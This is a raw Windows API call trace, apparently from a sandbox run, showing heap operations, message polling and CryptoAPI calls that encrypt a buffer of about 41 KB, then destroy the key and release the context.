PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.629] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.629] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.629] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.630] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.630] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.630] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.631] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa1d4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa1e0) returned 1 [0173.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.631] CharLowerBuffW (in: lpsz="byte[41441]", cchLength=0xb | out: lpsz="byte[41441]") returned 0xb [0173.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.634] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.634] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9c5180*, pdwDataLen=0x87e820*=0xa1d4, dwBufLen=0xa1e0 | out: pbData=0x9c5180*, pdwDataLen=0x87e820*=0xa1e0) returned 1 [0173.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.636] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.636] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.637] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0173.637] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0173.637] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0173.637] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0173.637] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0173.637] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0173.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.638] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.638] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.638] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.638] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.643] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.649] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0173.649] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.649] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.650] CryptDestroyKey (hKey=0x90af18) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.650] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.650] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.650] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.650] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.650] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.651] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.651] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.651] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.651] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.651] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.651] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0173.651] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.651] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.651] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.652] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.652] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.652] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0173.652] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.652] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0173.652] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.652] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0173.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0173.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.652] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0173.653] 